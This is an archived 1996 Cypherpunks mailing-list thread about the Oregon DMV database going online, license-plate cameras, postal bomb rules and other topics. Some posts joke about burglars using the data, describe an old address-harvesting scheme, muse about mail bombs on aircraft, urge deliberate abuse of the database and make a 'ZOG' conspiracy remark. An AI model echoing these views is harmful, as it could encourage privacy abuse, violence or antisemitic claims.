                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 8 Aug 1996, jim bell wrote:

> The Oregon DMV database needs a new home.  I've seen a few
> mentions of willing volunteers,...

It probably needs a whole new domain.  How 'bout:

			burglary.org

That way, when burglars see an Oregon car loaded with a family
heading south into California on vacation, they can just go on
line and get those folks' address from the database.  

Afterwards, a thank you note to Oregon's DMV would be in order.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Fri, 9 Aug 1996 23:24:44 +0800
To: cypherpunks@toad.com
Subject: alien life found
Message-ID: <9608091153.AA01894@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


it's no good them showing up now. welfare for alien life forms, even if they 
are just germ life forms, is definitely out, as of right now, so they shouldn't
even ask.

	-paul

crypto relevance? it's obviously, isn't it?


> From cypherpunks-errors@toad.com Wed Aug  7 18:47:42 1996
> X-Sender: schryver@radiks.net
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Wed, 07 Aug 1996 05:20:33 -0500
> To: cypherpunks@toad.com
> From: Scott Schryvers <schryver@radiks.net>
> Sender: owner-cypherpunks@toad.com
> Content-Length: 380
> 
> NBC News at Sunrise has just announced the discovery of alien life on the 
> planet Mars.  The lifeform that became extinct more than 2 billion years
> ago was found as a fossil in a meteor that originated from mars and landed
> on earth.  The fossil found was a primitive germ life form.
> 
> PGP encrypted mail preferred.  
> E-Mail me for my key.
> Scott J. Schryvers <schryver@radiks.net>
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 10 Aug 1996 01:51:09 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Going Postal (Was: Boom!)
In-Reply-To: <ae2fef91080210040d06@[205.199.118.202]>
Message-ID: <199608091158.HAA13329@nrk.com>
MIME-Version: 1.0
Content-Type: text


Tim:
> >The Post Office has now jumped on the terrorist bandwagon by
> >announcing that it will no longer be legal to drop any package
> >weighing over 16 ounces into a collection box.
> 
> Actually, CNN was reporting that this is for _airmail_ only. Which makes a
> certain kind of sense, given the situation with bomb technology.


Errrr.... Can you specify 'ground-only' anymore at the PO? I think
not. In years past you could pay extra for air, but often were
getting it anyhow.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Sat, 10 Aug 1996 02:59:00 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
Message-ID: <199608091513.IAA21952@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Aug 09 10:12:37 1996
> The Post Office has now jumped on the terrorist bandwagon by 
> announcing that it will no longer be legal to drop any package
> weighing over 16 ounces into a collection box. 
> 

...

> 
> I suspect one could do a lot of damage to a mailbox with under 16
> ounces of the proper explosive.  Perhaps one of our resident
> Cypherpunks bomb experts could expand on this subject.

Don't know that I'm a 'bomb expert', but it would appear reasonable that 6 
just-under-a-pound bombs would do approximately as much damage as a 
similarly sized larger device.

Even if the 6 devices got scattered to two or more aircraft, the terror 
factor would be significant

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMgqeo8VrTvyYOzAZAQFGfAP3ZL7pgWjadNN93mtwdG4cm60VjGcdP4G9
JlwS96gs6QJ0lD1CImMQL82KUIYe1IpPidC3bq5kTQhGbdM69yFiUmCxOGNwnH1L
pEbeEZ/OGDf0bnk/BYhoRKp1ufgdTVVSB1T0WZEYIaLe2zX1zzQPli4LW4UPUrds
5tmjt4QMEg==
=AZ0H
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Sat, 10 Aug 1996 02:22:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Thank you for not smoking" and other euphemisms
In-Reply-To: <ae2fe17707021004bcfc@[205.199.118.202]>
Message-ID: <320B2C4A.337C@research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


T> "Donations suggested." This usually for leftist events, e.g., a 
speech by a
> Nicaraguan freedom fighter. Of course, what they really mean is "admission
> fee mandatory," but they call it a "suggested donation." I doubt one will
> be arrested for barging through the door without paying the "suggested
> donation," but this is a possibility, as they may deny admission.

My dad did this once, in a museum. There was no altercation, but it 
does take a certain amount of balls.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "i am not a number!" <geeman@best.com>
Date: Sat, 10 Aug 1996 02:27:55 +0800
To: cypherpunks@toad.com
Subject: photographed license plates
Message-ID: <320B5805.712E@best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 21:55 8/8/96, i am not a number! wrote:
>CBS radio news this morning: 80,000 commuters traveling the central
>f'way in SF will have information mailed to them regarding the quake
>retrofit blah blah.
>
>How?  Their license plates have been photographed.
>... and the cheery "news" anchorwoman sweetly moved on to the next
>story.....

>> You *are* making this up, right? Please say you did.

------------------------------------------

I AM NOT making this up, unfortunately.
The news story contents may be bolluxed, of course, maybe they got it 
wrong.
But this is what she said, no joking.

O, and I think they're talking more about putting up cameras at some 
troubling intersections to take pictures of cars running red-lights.

And cameras on transit vehicles (buses primarily).

Gee, I am starting to feel so warm and safe!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 10 Aug 1996 02:07:35 +0800
To: rich@c2.org (Rich Graves)
Subject: Re: anarchy cookbook???
In-Reply-To: <Pine.GUL.3.95.960808231233.8399A-100000@Networking.Stanford.EDU>
Message-ID: <199608091332.IAA19907@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Rich Graves wrote:
> 
> On Thu, 8 Aug 1996, Michael Cortes wrote:
> 
> > cypherpunks
> > 
> > Ok this is what happend.I was looking around on the www. And came across 
> > the jolly roger "anarchy cookbook" and i was wondering.Any one know what 
> > happend to jolly roger?
> 
> He blew himself up cooking napalm according to his directions.

Napalm isn't really explosive. it is not a really dangerous substance
unless it is spread around by some explosion and ignited. I myself
had napalm burning on my clothes, and it really was not a big deal
(you have to extinguish it though). In that case napalm was not
spread by an explosion.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sat, 10 Aug 1996 03:48:11 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960809154848.0126c108@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 PM 8/8/96 -0700, Timothy C. May wrote:
>At 2:49 AM 8/9/96, John F. Fricker wrote:
>
>>Isn't that the role of legislation? To implement solutions that society
>>would not do on it's own?
>>
>>The enabling technology is obviously off the self.
>>
>>I think you may have misinterpretted my last sentence which was supposed to
>>have had a ? at the end. Where's the proof reader when you need one!
>
>"To implement solutions that society would not do on it's own?"
>
>Would not do, or could not do? It is within anyone's power to ask their
>psychiatrist what form of encryption he uses to protect his files. Likewise
>with doctors and hospitals.
>

Well where there's a will there's a way.

I agree that the general public and the market place often lacks the power
to affect particular events. Central planning can facility certain
processes. Free-marketers may argue that I can query and select based upon
my encryption criteria but chances are my psychiatrist will do nothing more
than "make note" of paranoia and ponder it's significance: "Do you resent
your mother?"



>(Though I freely admit that one would not be likely to get very far. For at
>least the next decade or two, the reaction will likely be "Huh?" But
>"legislation" mandating a form of encryption is not the answer. For many
>reasons.)
>
>On this list at least, calls for passing laws to implement societal
>solutions are not usually smiled upon. This is not to say such discussions
>are out of bounds, only that you'd better make some persuasive arguments
>and not just appeal to our common sense sympathies for social engineering
>and more laws.

I am not a great fan of social engineering and regulations. Yet the
legisture in Oregon may get called for a special session to address this
issue and I see this an opportunity for a grander arguement than merely
acccess to the DMV data. And as much as we dislike the presence of the
governments they do indeed exist. Living within their domain limits our
choices to either: complacency through inaction (cynicism et al), attempts
at isolation (back to the land), or taking an active role through voting,
education, civil disobedience or participation in the process (a pox on
party politics! the latter choice is easily the least enticing while civil
disobedience can be truly fun! >g<). Ok so call me a statist and shove me
out the door, but I am not argueing for the existance of a state. It does
currently exist and I am not self-sufficient. But I digress.

So. 

#1) My state legislature may very well get called to address this issue. Do
they have any concept of the big picture here? That the DMV data is one
small part of a debate regarding privacy which needs to be addressed. This
is an opportunity for some education and by the end of the day I should know
if my representatives are willing to listen.

#2) The records industry (for lack of a better term to encompass all
companies that accumulate data on individuals) needs some standards and
guidelines. Or walls and fences. Maybe even bars and a moat! And the sooner
the better. Federally imposed software requirements are not uncommon in
certain industries. It is time for standards for the personal data
maintained by co-operating entities (ie agencies the public co-operates with
such as doctors, the DMV, and so on).

#3) The goal is the anonymous citizen. The first step it to secure the data
currently exposed. Can this be done _without_ legislation?

--j







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 10 Aug 1996 00:57:53 +0800
To: cypherpunks@toad.com
Subject: Re: "Thank you for not smoking" and other euphemisms
Message-ID: <199608091255.FAA19436@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> (And then there's the "sliding scale donation suggested," say, from $5 to
> $15. Presumably this is the embodiment of pure Marxist theory, "from each
> according to his ability, to each according to his need." Be interesting to
> see their reaction if one declined to make any donation.)
> 
> --Tim May

This summer I went to meet my wife at the American Museum of
Natural History in NYC, and discovered that I had a total of 10 cents
in pennies in my pocket - and that they took only cash or checks, and 
the 'suggested donation' was $6. The nearest cash machine was
several blocks away. So, I paid 10 cents. The cashier took it without
batting an eye, gave my my donor's tag (they no longer use the little
metal ones depicting a dinosaur (sigh)), and said 'Thank you'.

Peter Trei
trei@process.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 10 Aug 1996 04:03:21 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.LNX.3.94.960809064227.730D-100000@switch.sp.org>
Message-ID: <Pine.GUL.3.95.960809090633.11566A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Aug 1996, The Deviant wrote:
> On Thu, 8 Aug 1996, Rich Burroughs wrote:
> > I do think that the information should be able to be disseminated on the
> > Net as long as it's legal.

What does "legal" have to do with it?

> Yes, but I can also see why its a bad idea to put somebody's VIN on the
> Net... A clever terrorist would simply plant peices of metal with some
> other loser's VIN's in their car before blowing up a building, (i.e. my
> name's McVeigh (sp?), and this rider truck came from Oregon ;)... see my
> point?

Come on, we all know that McVeigh was set up by ZOG. It was conclusively
proven that the Oklahoma City Federal Building was bombed from the inside
with military explosives, a clear provocation.

> I do think that some information could be allowed (what your tag says,
> your name, your mailing address), but what was put on he net was excesive.

What do you mean, "allowed"? The market will decide. If you don't like what
someone has said about you, send Jim Bell an anonymous note. The market will
decide.

Fucking statist.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMgtjX5NcNyVVy0jxAQGECAH9G6/T6243AP0/IyxGEgZ6UHALcgWypJsa
B4rxfxhQIichV7crUQ5cJvvXdyGZFMlZLPbHolgNbb+ik4sDk7YkBA==
=2z/C
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Sat, 10 Aug 1996 02:38:37 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
Message-ID: <199608091519.JAA05472@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> wrote:

>When supporting plans like GAK ("key escrow") and wiretaps...

<snip>

>If we allow this fiasco to die without a full analysis,
>particularly in light of the government's repeated assurances
>with regards to search warrants, we will be as incompetent as
>the police were.

Further, my original question, phoned in anonymously to the FBI,
mailed in anonymously to this list, and asked to the media (I
guess I like wasting my time) has never been either asked or
answered. I will restate it in stronger terms:
"Why the hell, when you have a tape of the perp. saying something,
do you not air it in the middle of a city chock full of people
who could very well know this guy's voice/mannerisms?" Why didn't
the media ask for it, and then give the answer (the fibbieclerk
had no answer at all for me) the FBI gave?? Am I missing something?
We hear 911 tapes ALL THE TIME of various stuff happening. Has the
FBI suddenly become a bunch of civil liberties activists WRT the
privacy of terrorist bombers?
Just asking.
me







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 10 Aug 1996 04:51:47 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <4uep7t$tkp@joseph.cs.berkeley.edu>
Message-ID: <Pine.GUL.3.95.960809091549.11566B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 9 Aug 1996, David Wagner wrote:

> In article <Pine.GUL.3.95.960808151724.6575A-100000@Networking.Stanford.EDU>,
> Rich Graves  <rich@c2.org> wrote:
> > I agree that this project needed to be done to educate the public, but I
> > must say I'm glad my name isn't attached to it. 
> > 
> > To answer legitimate concerns about abuse, perhaps version 2 could make the
> > relevant http logs publicly available?
> 
> I'd be most proud to have my name associated with such a project.
> 
> I say, what we need is a little more abuse.  I say, a well-publicized
> incident of abuse of the driver's license database can do more to
> help the cause of privacy than any amount of intellectually compelling
> debate.  Perhaps one horrible incident of abuse would ignite enough
> public backlash to stop states from selling their databases at the
> drop of a hat.

We did this in California, remember? You just need to target someone who's
been on TV.

> We have been shown all too many times how much a highly-publicized
> case of abuse can be used to trample on our civil liberties.  It's
> about time for us to wise up.  It's time to fight fire with fire.

I quite agree. But make it a controlled burn. Log everything. Restrict bulk
downloads. You don't need to let the genie all the way out of the bottle to
say "look, a genie."

It might be fun to make the database open for a couple weeks, without a
caveat about logging, and then publish the logs. Allow reverse lookups,
i.e., who looked up my record.  A nice little dragnet of people who are
interested in invading your privacy. 

For the near-medium term, I am resigned to the fact that government is going
to collect personal information, and that it is going to leak out. I'm just
interested in full disclosure of the leaks, and who is benefiting from them. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMgtmIJNcNyVVy0jxAQGvYgIArY2RcSR5RWaVDIzDGs1cVqSnCH5nhPL+
Y5VLghwkSnNcr5NPSJzc2BFWHB40c4aXb5pPnLaSjPiwj5HgkmE0Tg==
=Es4x
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Aug 1996 09:24:11 +0800
To: cypherpunks@toad.com
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
Message-ID: <ae3118a30102100402f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:54 PM 8/9/96, Ernest Hua wrote:


>Also, the FBI, no doubt, has voice analysis systems much more
>capable of detecting subtleties.  100,000 enthusiastic people

But the FBI presumably has no data base of voices to compare the voice on
the 911 tape to! They can have the most sophisticated voice analysis system
in the world and it useless, except in comparing the voice to
previously-recorded samples.

(This is presumably how the NSA's capabilities are used, as they have the
voice patterns of Boris Yeltsin, Yassir Arafat, Saddam Hussein, Bob Dole
and other previously-recorded voices. Plus, they can use COMINT at will
outside the U.S. (and maybe in the U.S....) and can acquire new voice
patterns for their libraries.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 10 Aug 1996 00:56:45 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
Message-ID: <199608091318.GAA20040@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes:
> 

> Regarding that town nearby that passed a _requirement_ that all households
> have a gun:

[...]

Quite a while back, I read an article in National Rifleman (the NRA
magazine), that for part of  the 19th century  it was the law that all 
adult men in the Balkan statelet of Montenegro must carry a pistol
when in public (a close relative of the ruler had a monopoly on the 
manufacture and sale of firearms in the kingdom).

Traveler's reports noted the extreme civility of Montenegrin
society during this period.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 10 Aug 1996 05:15:31 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <Pine.SUN.3.91.960808151142.29184B-100000@crl11.crl.com>
Message-ID: <Pine.BSI.3.91.960809092953.29835A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, Sandy Sandfort wrote:

> I can't find the exact quote, but Will Rogers quipped that every
> time Congress made a law, it was a joke.  And every time Congress
> made a joke it was a law.  The town near Morton Grove was not
> making a real requirement that every household have a gun, they
> were just making a joke at Morton Grove's expense.  In addition
> to the "exceptions," there was no penalty for violation of the
> law, thus making sure it was unenforceable.  It was not a case
> of "pro-gun fascism" but of rough American political humor.  At
> the very least it kept the city council out of more serious 
> mischief.

    This is very similiar to the law (federal I believe) which states 
that you must report any 'computer crimes' to the authorities.  There are 
no punishments and it was obviously crafted to be more of a means of 
counting the crimes than solving them.  If anyone is interetes, I will 
get the specifics.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Aug 1996 04:14:05 +0800
To: cypherpunks@toad.com
Subject: The Ostrich Security Principle
Message-ID: <ae30b617020210041126@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:47 PM 8/9/96, Sandy Sandfort wrote:

>It probably needs a whole new domain.  How 'bout:
>
>                        burglary.org
>
>That way, when burglars see an Oregon car loaded with a family
>heading south into California on vacation, they can just go on
>line and get those folks' address from the database.
>
>Afterwards, a thank you note to Oregon's DMV would be in order.


Sounds like a market niche to me...people at the border could sell the
plate numbers (and even full DMV searches) of cars they see....maybe with a
higher price paid for "real-time quotes," and a lower price paid for
"15-minute-delayed quotes." Just like the stock market.

By the way, I'm watching MSNBC and they're engaging in a fretfest about
this Oregon situation, with calls for "regulating the Internet."

"There is no good reason for this to be on the Internet." is one line I
heard. (If the stuff is legal to own, and is "public information," just
what exception to the First Amendment could be used to bar publishing?)

BTW, this latest issue is similar to the flap several years ago over Lotus'
plan to sell to the public a CD-ROM of zipcodes and whatnot. (I think it
was called "Lotus Neighborhoods.") So-called "privacy activists" raised a
hue and cry and the plan was cancelled. Of course, corporations and other
such interest groups can get the data, so not much was accomplished. Many
of us thought it was a blow to real privacy issues.

The Ostrich Security Principle: "It is more important to have the
_illusion_ of privacy than to have real privacy."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 10 Aug 1996 04:12:12 +0800
To: cypherpunks@toad.com
Subject: Re: Why should we trust the system?
Message-ID: <ae30b876030210049fa8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:19 PM 8/9/96, Anonymous wrote:

>Further, my original question, phoned in anonymously to the FBI,
>mailed in anonymously to this list, and asked to the media (I
>guess I like wasting my time) has never been either asked or
>answered. I will restate it in stronger terms:
>"Why the hell, when you have a tape of the perp. saying something,
>do you not air it in the middle of a city chock full of people
>who could very well know this guy's voice/mannerisms?" Why didn't
>the media ask for it, and then give the answer (the fibbieclerk
>had no answer at all for me) the FBI gave?? Am I missing something?
>We hear 911 tapes ALL THE TIME of various stuff happening. Has the
>FBI suddenly become a bunch of civil liberties activists WRT the
>privacy of terrorist bombers?
>Just asking.


This is the single best suggestion/question I have heard about this entire case!

Why, indeed, has the 911 threat not been aired publically, where someone
might recognize the voice as being that of their brother, or boss, or
whatever? And might hear immediately that whomever it is, it ain't Richard
Jewell.

If any of you cyber-journalists who hang out here in the wings on
Cypherpunks, collecting material for stories, are reading this, please ask
your journalists covering the Atlanta bombing about this.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sat, 10 Aug 1996 04:41:02 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
Message-ID: <9608091711.AA27237@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


How about a cypherpunks group activity
for the SF area?  2 per car, one to
drive, and one to moon....

    Ryan

---------- Previous Message ----------
To: geeman, cypherpunks
cc: 
From: shamrock @ netcom.com (Lucky Green) @ smtp
Date: 08/08/96 10:45:06 PM
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.

At 21:55 8/8/96, i am not a number! wrote:
>CBS radio news this morning: 80,000 commuters traveling the central
>f'way in SF will have information mailed to them regarding the quake
>retrofit blah blah.
>
>How?  Their license plates have been photographed.
>... and the cheery "news" anchorwoman sweetly moved on to the next
>story.....

You *are* making this up, right? Please say you did.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sat, 10 Aug 1996 05:20:44 +0800
To: The Deviant <deviant@sybase.com>
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <9608091717.AA27395@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually, DEC is trying to stay in business building
expensive Windows boxes.

The numbers I remember hearing are something like:
1,000,000 Unix machines
10,000,000 Macs
150,000,000 "PCs" (presumable not running *nix)

Why should we care what platform people develop for?
I use all of 'em.  If a package supports more than one, 
all the better.

As to why one should develop crypto stuff
for unix, the demographics of this list are probably
reason enough.. I use PCs as my main platform, 
but I get the distinct impression that most of
the folks here use unix primarily.  Maybe they're
just the most vocal :)

    Ryan

---------- Previous Message ----------
To: jwz
cc: cypherpunks
From: deviant @ pooh-corner.com (The Deviant) @ smtp
Date: 08/09/96 06:23:32 AM
Subject: Re: e$: Watching the MacRubble Bounce

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, Jamie Zawinski wrote:

> If you accept that, then doesn't that make writing crypto software for
> any Unix platform *even more* of a waste of time?  Because last time I
> checked, there were way more Macs on mom-and-pop's desks than Unix
> machines, counting *all* vendors.

Pardon my French, but you mus be fucking stupid or somehing.  How many
universities use UNIX platforms?  How many companies use UNIX platforms?
Sun, DEC, and SGI don't stay in buisiness by building cheap Windows boxes
ya know.  There are 13948 _registered_ LINUX machines, not to mention the
unregistered ones.  Don't tell me that Cray's were designed to run MacOS
or Windows 95.  UNIX isn' NEARLY as dead as Apple is.

 --Deviant
Military secrets are the most fleeting of all.
                -- Spock, "The Enterprise Incident", stardate 5027.4


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgrZbTAJap8fyDMVAQFSagf8C3/HIX7XwtFYRAKxhs8AlDIsO1EXDgr9
jm9RzjGMXqHkgg0OC/0Bzp+OtcYYL5qg/JtaZo90LIdPbqEeOb7HkcYgXkPZ9SLd
sQKIsZMr6IShG7ZIdPH9BRJWn131ExbUjCZ5IfMJVHsimTVbfLHHSppDylxtl2bG
pI6d9FdCWj8puL3omB9PD9gpjoaF4p961+HBclH8W6PLzI+swc/6f49Uxv3LIF4w
gm5IepZmoerW2iK2hwawngZPZJ4Sr4VqzyrAIvDl+rIFLFlN3ejNaGEjwHcNc43+
IBwoOS4kdv16faxT1jBskbKhcywmGqfIrap6Rdr0KkO5DyHHsSTz5g==
=UBUr
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Aug 1996 02:50:24 +0800
To: cypherpunks@toad.com
Subject: Re: "Thank you for not smoking" and other euphemisms
In-Reply-To: <320B2C4A.337C@research.att.com>
Message-ID: <DXDesD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien <s_levien@research.att.com> writes:

> T> "Donations suggested." This usually for leftist events, e.g., a 
> speech by a
> > Nicaraguan freedom fighter. Of course, what they really mean is "admission
> > fee mandatory," but they call it a "suggested donation." I doubt one will
> > be arrested for barging through the door without paying the "suggested
> > donation," but this is a possibility, as they may deny admission.
> 
> My dad did this once, in a museum. There was no altercation, but it 
> does take a certain amount of balls.
> 
I do it regularly at museums - I find their "suggested donations" for kids'
admissions a rip-off.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Aug 1996 05:30:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Ostrich Security Principle
In-Reply-To: <ae30b617020210041126@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960809103000.12094A-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 9 Aug 1996, Timothy C. May wrote:

> Sounds like a market niche to me...people at the border could
> sell the plate numbers (and even full DMV searches) of cars
> they see....

> By the way, I'm watching MSNBC and they're engaging in a
> fretfest about this Oregon situation, with calls for
> "regulating the Internet."

The Internet just makes it more efficient.  The way it used to
work, is that Northern California service station attendants
would look in Oregon cars they were servicing for registration
papers or get other indications (from drivers license, checks, 
credit card imprints or social engineering) the name and/or 
address of the traveler. This information was then sent to
accomplices in Oregon for "processing."  This is an OLD story.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Aug 1996 05:53:39 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.SUN.3.95.960809163408.14975A-100000@netcom10>
Message-ID: <Pine.SUN.3.91.960809103855.12094B-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 9 Aug 1996, jonathon wrote:

> In some states it is a misdemeanor to list anything other than
> your physical address. 

I believe that in California, you may have a PO Box on your 
driver's license, but the state has to have your "real" address
in its records.  As noted, some people forget to update this 
information when they move, and others list their lawyer's 
address with the state.  Presumably, that should satisfy the 
legal justifications for requiring an address.

> 	More important is ensuring that all the addresses that the 
> 	state has on you are the same.  The preference seems to be 
> 	to have the same address as is on one's checks.  

That may be the preference, but I just use my e-mail address on
